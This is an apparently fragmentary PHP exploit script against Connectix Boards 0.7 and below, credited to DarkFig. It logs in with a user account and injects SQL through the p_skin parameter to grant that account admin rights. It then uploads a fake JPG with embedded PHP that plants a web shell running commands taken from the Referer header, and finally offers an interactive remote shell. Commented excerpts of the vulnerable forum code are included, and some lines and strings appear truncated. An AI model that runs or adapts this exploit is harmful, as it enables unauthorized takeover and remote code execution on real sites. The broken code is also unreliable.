Connectix Boards versions 0.7 and below privilege escalation and remote code execution exploit.
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 9) {
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
PHP conditions: none
Credits: DarkFig <>
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example
-usr The username of your account
-pwd The password of your account
-type Privilege Escalation(1) or Code execution(2)
Options: -proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
"); exit(1);
$url = getparam('url',1);
$user = getparam('usr',1);
$pass = getparam('pwd',1);
$type = getparam('type',1);
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$theme = 'Zephyr';
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "\nTrying to get logged in";
if(preg_match("#password#",$xpl->showcookie())) print "\nLogged in";
else exit("\nExploit failed");
sploit(", usr_class=1");
if($type==1) exit("\nDone, $user is now admin.");
# Fake JPG (with php code) generated with edjpgcom.exe
# <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+');
# fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
$f = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00\xFF"
# +admin.bbcode.php
# |
# 95. if(isset($_POST['wherefile'])) {
# 96. if ($_POST['wherefile']=='upload') {
# 97. if (!empty($_FILES['uploadimage']['size'])){
# 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) {
# 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver'];
# 102. $filename = str_replace('../','',trim($filename));
# 103. //si le filenameserver contient un dossier : on crée ce dossier:
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) {
# 106. $do=true;
# 107. }
$arr = array(frmdt_url => $url.'admin.php?act=bb&sub=4',
"sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:",
"sm_filenamesubdir" => "libraries/",
"sm_filenameserver" => "xd.gif.php",
"wherefile" => "upload",
"sm_send" => "Confirmer",
"uploadimage" => array(frmdt_type => "image/gif",
frmdt_filename => "xd.gif.php",
frmdt_content => $f));
print "\n\$shell> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
print $xpl->getcontent()."\n\$shell> ";
function sploit($sql)
global $url,$xpl,$theme,$user;
$pdat = "changeparams=1"
."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #"
# +common.php
# |
# 95. function cleanArray(&$arr) {
# 96. if (!empty($arr) && is_array($arr)) {
# 97. foreach($arr as $k => $v) {
# 98. if (is_array($v)) cleanArray($arr[$k]);
# 99. else $arr[$k] = stripslashes($v);
# 100. }
# 101. }
# 102. }
# |
# 105. if (get_magic_quotes_gpc()) {
# 106. cleanArray($_POST);
# 107. cleanArray($_COOKIE);
# 108. cleanArray($_GET);
# 109. }
# +part.userprofile.php
# |
# 305. /* Changement des paramètres d'affichage (pas accessible par les modos ou admins) */
# 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) {
# 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res'],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) {
# 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) {
# 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) {
# 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST['p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res='".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."',usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid);
# 311. $_SESSION['cb_user']->reloadnext=true;
# 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid'].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html'));
# +lib.cb.php
# |
# 117. function isLang ($langtype) {
# 118. return is_dir(CB_PATH.'lang/'.$langtype);
# 119. }
# |
# 133. function isSkin ($skintype) {
# 134. return is_dir(CB_PATH.'skins/'.$skintype);
# 135. }
if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return;
else exit("Exploit failed");
function getparam($param,$opt='')
global $argv;
foreach($argv as $value => $key)
if($key == '-'.$param) return $argv[$value+1];
if($opt) exit("\n-$param parameter required");
else return;